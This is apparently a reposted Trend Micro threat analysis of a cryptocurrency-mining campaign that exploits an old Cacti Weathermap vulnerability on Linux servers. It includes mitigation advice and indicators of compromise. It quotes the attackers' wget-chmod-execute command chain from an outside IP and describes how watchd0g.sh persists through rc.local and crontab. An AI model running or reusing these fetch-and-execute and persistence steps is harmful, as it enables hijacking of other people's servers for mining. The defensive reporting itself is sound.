Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers

Legitimate and large-scale cryptocurrency mining operations often invest in dedicated hardware and electric consumption to make a profit. This doesn’t escape the attention of cybercriminals: Malicious cryptocurrency mining was so pervasive last year that it was the most detected network event in devices connected to home routers.

Through our incident response-related monitoring, we observed intrusion attempts whose indicators we’ve been able to correlate to a previous cryptocurrency-mining campaign that used the JenkinsMiner malware. The difference: this campaign targets Linux servers. It’s also a classic case of reused vulnerabilities, as it exploits a rather outdated security flaw whose patch has been available for nearly five years.

Feedback from Trend Micro’s Smart Protection Network indicates it’s an active campaign, primarily affecting Japan, Taiwan, China, the U.S., and India.

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers
Figure 1. Network intrusion attempts observed from the cryptocurrency-mining campaign
(December 2017 to mid-March 2018)

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux ServersFigure 2. Country distribution of the malicious cryptocurrency-mining campaign

Attack chain analysis
This campaign’s operators were exploiting CVE-2013-2618, a dated vulnerability in Cacti’s Network Weathermap plug-in, which system administrators use to visualize network activity. As to why they’re exploiting an old security flaw: Network Weathermap only has two publicly reported vulnerabilities so far, both from June 2014. It’s possible these attackers are taking advantage not only of a security flaw for which an exploit is readily available but also of patch lag that occurs in organizations that use the open-source tool.

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers
Figure 3. Threat indicators showing how the Weathermap vulnerability is exploited

As seen above, we can see that:

  1. The blurred part is the target web server/port.
  2. The file /plugins/weathermap/configs/conn.php is the resulting file from the persistent cross-site scripting (XSS) on /plugins/weathermap/php.
  3. The ideal targets are Linux web servers (although Cacti and the plug-in can be installed on Windows as well).

Aside from the initial conn.php, we observed a similar HTTP request applying to a page called ‘cools.php’:

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers
Figure 4. A similar HTTP request to cools.php

As seen above, these commands would be executed:

  • wget watchd0g.sh hxxp://222[.]184[.]]79[.]11:5317/watchd0g[.]sh
    //download the file with the use of wget, a default utility most Linux systems have
  • chmod 775 watchd0g.sh
    // make the file executable
  • ./watchd0g.sh
    // finally, make the file executable

The watchd0g.sh file contains the following code:

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers
Figure 5. Code snapshot of watchd0g.sh

Code is written in /etc/rc.local, which means that each time a system is restarted, watchd0g.sh is executed. The modification of /etc/crontab results in watchd0g.sh being run every three minutes. It then modifies the Linux kernel parameter vm.nr_hugepages to the recommended value for mining Monero (XMR). It also ensures that the watchd0g.sh process runs or re-downloads and executes the file if it terminates.

Its main purpose is to download another file, dada.x86_64, (detected by Trend Micro as COINMINER_MALXMR.SM-ELF64) from the same server where watchd0g.sh was retrieved.

Analyzing the Linux XMRig miner
The final payload (dada.x86_64 as of 01/28/2018, earlier named as xig or nkrb) is a modified XMRig miner. XMRig is a legitimate, open-source XMR miner with multiple updated versions that supports both 32-bit and 64-bit Windows and Linux operating systems. XMRig displays the following when executed via command line:


Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers

Figure 6. dada.x86_64 executed via command line

XMRig should be executed along with a configuration file called ‘config.json’, or with parameters that specify/require details such as the algorithm to be used (CryptoNight/CryptoNight-Lite), maximum CPU usage, mining server, and login credentials (Monero wallet and password). The samples used in this attack were modified in a way that renders the configuration or parameters unnecessary. Everything is already embedded in its code. The command-line display also does not appear in most samples.

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers
Figure 7. Parameters supposedly specified/required by the miner

Following the Monero trail
We gathered five possible samples that led us to two unique login usernames, matching the Monero wallets where the mining pool payments are sent.

The attackers mined approximately 320 XMR or about $74,677 (as of March 21, 2018) based on the two wallets. Note that this is only a small portion of the profit for this entire campaign. Earlier reports of the same campaign uncovered $3 million worth of XMR from a single Monero wallet.

SHA256 Mining Server Username Password
690aea53dae908c9afa933d60f467a17ec5f72463988eb5af5956c6cb301455b pool[.]minexmr[.]com:443 42zJYtQbSVrYVzoE97RCn45T9SmfCTGYB9QWDw6Zt2jwX7BzrfNXvoa4SSs1n71S3g1NLyPHyx4nKY8KKtovCqjLPViqYrL x
48cf0f374bc3add6e3f73f6db466f9b62556b49a9f7abbcce068ea6fb79baa04 pool[.]supportxmr[.]com:80 42zJYtQbSVrYVzoE97RCn45T9SmfCTGYB9QWDw6Zt2jwX7BzrfNXvoa4SSs1n71S3g1NLyPHyx4nKY8KKtovCqjLPViqYrL x
1155fae112da3072d116f39e90f6af5430f44f78638db3f43a62a9037baa8333 xmr[.]krbpool[.]com:443 45AarDcdcDXXdT7aRt2dpoMwQdEj4WzLyS5YvD4zDBYRLQFKxudkJMdR98RmyqmSdD4gR4hZusqwmfk7gF439YmzCnFmKDj x
2c7b1707564fb4b228558526163249a059cf5e90a6e946be152089f0b69e4025 pool[.]supportxmr[.]com:80 42zJYtQbSVrYVzoE97RCn45T9SmfCTGYB9QWDw6Zt2jwX7BzrfNXvoa4SSs1n71S3g1NLyPHyx4nKY8KKtovCqjLPViqYrL x
d814bf38f5cf7a58c3469d530d83106c4fc7653b6be079fc2a6f73a36b1b35c6 pool[.]supportxmr[.]com:80 42zJYtQbSVrYVzoE97RCn45T9SmfCTGYB9QWDw6Zt2jwX7BzrfNXvoa4SSs1n71S3g1NLyPHyx4nKY8KKtovCqjLPViqYrL x

Figure 8. Samples containing the Monero wallets

Conclusion and mitigation
The campaign’s attack chain requires the following:

  • A web server running Linux (x86-64), given the custom XMRig Miner 64-bit ELFs
  • The web server should be publicly accessible
  • Cacti (an open-source, web-based network monitoring and graphing tool) had to be implemented with the Plugin Architecture working and an outdated Network Weathermap (0.97a and prior)
  • The web server hosting Cacti does not require authentication to access the web site resource
  • For perfect execution, the web server should be running with ‘root’ (or equivalent) permissions (some of the commands in sh require root privileges)

The first two are almost a given, but the last three raise eyebrows: Why would one want to share network data publicly (Cacti)? Is the web server really being run as ‘root’?

Data from Cacti should be properly kept internal to the environment. Having this data exposed represents a huge risk in terms of operational security. While this allows systems or network administrators to conveniently monitor their environments (with just a browser bookmark, for instance), it also does the same for threat actors. There are alternatives that do the same thing, but countermeasures should be taken to harden and secure the systems from compromise or abuse. Naturally, keeping systems updated with the latest patches (or employing virtual patching for legacy systems/networks) can also make it more difficult for potential attackers.

A proactive incident response strategy that includes actively hunting and responding to threats also helps provide more visibility into attacks that may be overlooked by traditional security solutions. Identifying the techniques also empowers organizations with actionable intelligence that can help create stronger benchmarks for response.

Trend Micro™ Deep Discovery™ provides detection, in-depth analysis, and proactive response to attacks using exploits and other similar threats through specialized engines, custom sandboxing, and seamless correlation across the entire attack lifecycle, allowing it to detect these attacks even without any engine or pattern update. Trend Micro™ Deep Discovery Inspector™ protects customers from this attack via these DDI rule:

  • DDI Rule ID 2452: Wget Commandline Injection

Trend Micro™ Deep Security and Vulnerability Protection protect users from threats that may target the aforementioned vulnerability (or use XSS attack) via the following DPI rules:

  • 1005934 – Identified Suspicious Command Injection Attack
  • 1006823 – Identified Suspicious Command Injection Attack – 1
  • 1000552 – Generic Cross Site Scripting(XSS) Prevention

Trend Micro™ TippingPoint™ customers are protected from the aforementioned threat via this MainlineDV filter:

  • 3886: HTTP: Cross Site Scripting in POST Request

Indicators of Compromise
Trend Micro also identified the attacking IP addresses. However, since the nature of machines indicates they can be remotely controlled, it would not be worthwhile to list them. Our research also led us to a possible tool written in Python that was used in this campaign, using the HTTP User-Agent ‘python-requests/2.18.4’.

Related Hashes:

SHA256 Description
4a70da8ad6432d7aa639e6c5e0c03958eebb3728ef89e74c028807dd5d68e2b4 Bourne-Again shell script ASCII text executable
0adadc3799d06b35465107f98c07bd7eef5cb842b2cf09ebaeaa3773c1f02343 ELF 64-bit LSB executable x86-64 version 1 (GNU/Linux) dynamically linked interpreter /lib64/ld-linux-x86-64.so.2 for GNU/Linux 2.6.32 BuildID[sha1]=7b9059fbf5f223af2bf1d83251d640e0f60bbe00 stripped
d814bf38f5cf7a58c3469d530d83106c4fc7653b6be079fc2a6f73a36b1b35c6 ELF 64-bit LSB executable x86-64 version 1 (GNU/Linux) dynamically linked interpreter /lib64/ld-linux-x86-64.so.2 for GNU/Linux 2.6.32 BuildID[sha1]=5722b052bfd047b57ec3710dd948bfc9ee7d7316 stripped
7f30ea52b09d6d9298f4f30b8045b77c2e422aeeb84541bb583118be2425d335 ELF 64-bit LSB executable x86-64 version 1 (GNU/Linux) dynamically linked interpreter /lib64/ld-linux-x86-64.so.2 for GNU/Linux 2.6.32 BuildID[sha1]=9bc00ee0d5261d8bb29b753b8436a1c54bd19c94 stripped
690aea53dae908c9afa933d60f467a17ec5f72463988eb5af5956c6cb301455b ELF 64-bit LSB executable x86-64 version 1 (SYSV) dynamically linked interpreter /lib64/ld-linux-x86-64.so.2 for GNU/Linux 2.6.18 stripped
1155fae112da3072d116f39e90f6af5430f44f78638db3f43a62a9037baa8333 ELF 64-bit LSB executable x86-64 version 1 (SYSV) dynamically linked interpreter /lib64/ld-linux-x86-64.so.2 for GNU/Linux 2.6.18 stripped
2c7b1707564fb4b228558526163249a059cf5e90a6e946be152089f0b69e4025 ELF 64-bit LSB executable x86-64 version 1 (SYSV) dynamically linked interpreter /lib64/ld-linux-x86-64.so.2 for GNU/Linux 2.6.18 stripped
48cf0f374bc3add6e3f73f6db466f9b62556b49a9f7abbcce068ea6fb79baa04 ELF 64-bit LSB executable x86-64 version 1 (SYSV) dynamically linked interpreter /lib64/ld-linux-x86-64.so.2 for GNU/Linux 2.6.18 stripped


IP Addresses and URLs related to the malicious/modified XMRig Miner:

  • 222[.]184[.]79[.]11
  • bbc[.]servehalflife[.]com
  • 190[.]60[.]206[.]11
  • 182[.]18[.]8[.]69
  • jbos[.]7766[.]org
  • 115[.]231[.]218[.]38

The post Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers appeared first on .

Read more: Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers

Incoming search terms

Story added 21. March 2018, content source with full text you can find at link above.